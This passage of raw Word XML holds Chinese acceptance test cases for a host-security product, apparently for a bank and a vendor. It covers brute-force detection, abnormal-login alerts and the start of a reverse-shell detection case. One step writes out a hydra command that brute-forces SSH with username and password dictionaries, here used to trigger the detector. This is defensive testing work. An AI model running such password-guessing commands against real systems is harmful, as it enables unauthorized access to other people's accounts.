      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>暴力破解检测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="90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7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案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>暴力破解检测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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>支持暴力破解阈值设定，能够检测暴力破解行为，当发现暴力破解行为时，能够拉黑攻击IP。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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>服务器上开放远程连接端口，安装暴力破解工具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测试拓扑</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rP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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>登录服务端，找到暴力破解设置模块</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>打开对应测试机的暴力破解防护开关</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>在攻击机上对测试机执行不同的攻击语句：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>爆破ssh，执行命令：hydra  -L 用户名字典路径 -P 密码字典路径 -vV %ip% ssh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测试工具：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="140" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="140"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>能够检查出ssh暴力破解行为。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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>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rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"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rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc1749302704"/>
      <w:bookmarkStart w:id="39" w:name="_Toc16878"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>异常登录检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="90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7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案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>异常登录检测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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>能够检查异常登录行为。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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>预置条件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>服务器上开放远程连接端口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测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rP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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>支持常用登录IP段监控、常用登录时间监控</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>设置常用登录IP为Redhat-67-02的局域网IP、常用登录时间为20：00-21：00、</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>使用Redhat-67-01（白名单外的ip）的主机登录Oracle-76-01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>使用Redhat-67-02(白名单内的ip)的主机在09：00时登录Oracle-76-01，ssh root@</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Oracle-76-01的ip}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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>结果1(步骤2)：能监测异常IP登录告警</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>结果2(步骤3)：能检测到异常登录时间的告警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测试工具：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>  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jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>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rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc1479418698"/>
      <w:bookmarkStart w:id="41" w:name="_Toc7699"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>反弹shell检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="90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7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案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>反弹shell检测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测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>能够发现反弹shell行为。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预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
